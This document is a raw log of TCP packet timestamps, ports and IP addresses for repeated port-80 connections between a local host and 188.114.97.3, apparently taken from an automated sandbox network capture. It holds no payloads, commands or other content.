                                                                                                                  Oct 27, 2024 19:23:50.608757019 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.614202023 CET8050087188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.614290953 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.614419937 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.619937897 CET8050087188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.680624962 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.686069012 CET8050086188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.686352015 CET8050086188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.928251028 CET8050086188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.961886883 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:50.967549086 CET8050087188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:50.977411032 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:51.123960018 CET8050086188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:51.164817095 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:51.242623091 CET8050087188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:51.289815903 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:51.434400082 CET8050087188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:51.492975950 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.405580997 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.405746937 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.407058954 CET5009080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.411837101 CET8050086188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:52.411859989 CET8050087188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:52.411914110 CET5008680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.411928892 CET5008780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.412444115 CET8050090188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:52.412503958 CET5009080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.415956974 CET5009080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.421277046 CET8050090188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:52.774441004 CET5009080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:52.780040026 CET8050090188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.416420937 CET8050105188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.416435003 CET5010380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:08.416491985 CET5010580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:08.416589975 CET5010580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:08.421890974 CET8050105188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.543351889 CET8050104188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.680459023 CET5010480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:08.735501051 CET8050104188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.774347067 CET5010580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:08.780071020 CET8050105188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:08.789850950 CET5010480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.005068064 CET8050105188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:09.149350882 CET5010580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.198709011 CET8050105188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:09.344537973 CET5010480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.344569921 CET5010580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.345007896 CET5010680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.350459099 CET8050106188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:09.350594997 CET8050104188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:09.350645065 CET5010680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.350682020 CET5010480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.350784063 CET5010680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.351161003 CET8050105188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:09.351320028 CET5010580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.356197119 CET8050106188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:09.696307898 CET5010680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:09.702411890 CET8050106188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:09.949908018 CET8050106188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:10.039833069 CET5010680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:10.166029930 CET8050106188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:10.283138037 CET5010680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:10.283586025 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:10.288964033 CET8050107188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:10.289048910 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:10.289078951 CET8050106188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:10.289148092 CET5010680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:10.289185047 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:10.294540882 CET8050107188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:10.633781910 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:10.639461040 CET8050107188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:10.885483980 CET8050107188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:10.930469990 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.088818073 CET8050107188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:11.133613110 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.211448908 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.212333918 CET5010880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.218323946 CET8050108188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:11.218414068 CET5010880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.218549967 CET5010880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.223979950 CET8050108188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:11.232589960 CET8050107188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:11.232650995 CET5010780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.571166992 CET5010880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:11.576689959 CET8050108188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:11.823554993 CET8050108188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:11.946233034 CET5010880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:12.024328947 CET8050108188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:12.149251938 CET5010880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:12.150810957 CET5010880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:12.151761055 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:12.156879902 CET8050108188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:12.156980038 CET5010880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:12.157176971 CET8050109188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:12.157440901 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:12.157521963 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:12.162942886 CET8050109188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:12.508647919 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:12.514292955 CET8050109188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:12.752188921 CET8050109188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:12.805596113 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.064238071 CET8050109188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.118001938 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.181189060 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.181840897 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.187274933 CET8050109188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.187371016 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.187671900 CET8050110188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.187771082 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.187891006 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.193223000 CET8050110188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.542790890 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.548372984 CET8050110188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.745949030 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.751518011 CET8050111188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.751661062 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.751929998 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.757282019 CET8050111188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.798648119 CET8050110188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.852376938 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.021791935 CET8050110188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.071091890 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.102468014 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.108171940 CET8050111188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.108294964 CET8050111188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.172418118 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.177174091 CET5011280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.178639889 CET8050110188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.178710938 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.182588100 CET8050112188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.182667971 CET5011280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.185909033 CET5011280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.191364050 CET8050112188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.356313944 CET8050111188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.446108103 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.540019035 CET5011280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.545562029 CET8050112188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.560854912 CET8050111188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.649554968 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.792488098 CET8050112188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.836767912 CET5011280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.998650074 CET8050112188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:15.118488073 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.118571043 CET5011280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.119200945 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.125001907 CET8050113188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:15.125205994 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.125442982 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.130810022 CET8050113188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:15.130872965 CET8050111188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:15.130955935 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.130980015 CET8050112188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:15.131047010 CET5011280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.477507114 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.483078003 CET8050113188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:15.740102053 CET8050113188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:15.789849997 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.048201084 CET8050113188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:16.102349043 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.162218094 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.163045883 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.168092012 CET8050113188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:16.168173075 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.168468952 CET8050114188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:16.168554068 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.168631077 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.173957109 CET8050114188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:16.526814938 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.532263041 CET8050114188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:16.759497881 CET8050114188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:16.805521965 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.955605030 CET8050114188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:17.008799076 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:17.081099033 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:17.081439972 CET5011580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:17.086810112 CET8050115188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:17.086905003 CET5011580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:17.086905956 CET8050114188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:17.086970091 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:17.086993933 CET5011580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:17.092302084 CET8050115188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:17.446266890 CET5011580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:17.451956987 CET8050115188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:17.697381020 CET8050115188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:17.742970943 CET5011580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:29.774142981 CET5012980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:29.905438900 CET5012980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:29.906616926 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:30.057266951 CET8050130188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:30.058343887 CET8050129188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:30.058439016 CET5012980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:30.058469057 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:30.058643103 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:30.063954115 CET8050130188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:30.414948940 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:30.420567036 CET8050130188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:30.670496941 CET8050130188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:30.867993116 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:30.973568916 CET8050130188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.071124077 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.100435972 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.101272106 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.106571913 CET8050130188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.106667042 CET8050131188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.106738091 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.106779099 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.106937885 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.112430096 CET8050131188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.217032909 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.223958015 CET8050132188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.224066019 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.224231005 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.229582071 CET8050132188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.462114096 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.467711926 CET8050131188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.587496996 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.593229055 CET8050132188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.593430042 CET8050132188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.709080935 CET8050131188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.789875984 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.826196909 CET8050132188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.893429995 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:31.919259071 CET8050131188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:31.977360010 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.037077904 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.037837029 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.043051958 CET8050131188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:32.043113947 CET5013180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.043359041 CET8050133188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:32.043452024 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.043570995 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.047009945 CET8050132188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:32.049108028 CET8050133188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:32.177707911 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.399358988 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.404953957 CET8050133188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:32.656481028 CET8050133188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:32.790869951 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:32.864372969 CET8050133188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:32.977364063 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.023803949 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.023848057 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.024764061 CET5013480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.029978991 CET8050132188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.030013084 CET8050133188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.030070066 CET5013380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.030128956 CET8050134188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.030138969 CET5013280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.030227900 CET5013480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.030313969 CET5013480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.036151886 CET8050134188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.383840084 CET5013480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.389507055 CET8050134188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.634983063 CET8050134188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.789864063 CET5013480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.834570885 CET8050134188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.958017111 CET5013480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.958599091 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.963756084 CET8050134188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.963823080 CET5013480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.964013100 CET8050135188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:33.964080095 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.964167118 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:33.969652891 CET8050135188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:34.321176052 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.326741934 CET8050135188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:34.591531038 CET8050135188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:34.761929035 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.814537048 CET8050135188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:34.867994070 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.950987101 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.951004028 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.956530094 CET8050136188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:34.956835032 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.956835032 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.957139969 CET8050135188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:34.958087921 CET5013580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:34.962394953 CET8050136188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:35.305845022 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.311347008 CET8050136188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:35.560169935 CET8050136188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:35.789948940 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.838161945 CET8050136188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:35.838184118 CET8050136188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:35.838242054 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.986536980 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.987209082 CET5013780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.992676973 CET8050137188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:35.992746115 CET5013780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.992831945 CET8050136188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:35.992871046 CET5013780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.992896080 CET5013680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:35.998366117 CET8050137188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:36.352576971 CET5013780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:36.357990026 CET8050137188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:36.597033978 CET8050137188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:36.745637894 CET5013780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:36.890199900 CET8050137188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.021941900 CET5013780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.024990082 CET5013880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.027878046 CET8050137188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.029354095 CET5013780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.030390978 CET8050138188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.030514956 CET5013880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.030648947 CET5013880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.035927057 CET8050138188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.105178118 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.110502005 CET8050139188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.110658884 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.110658884 CET5013980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:37.116087914 CET8050139188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:37.383734941 CET5013880192.168.2.4188.114.97.3
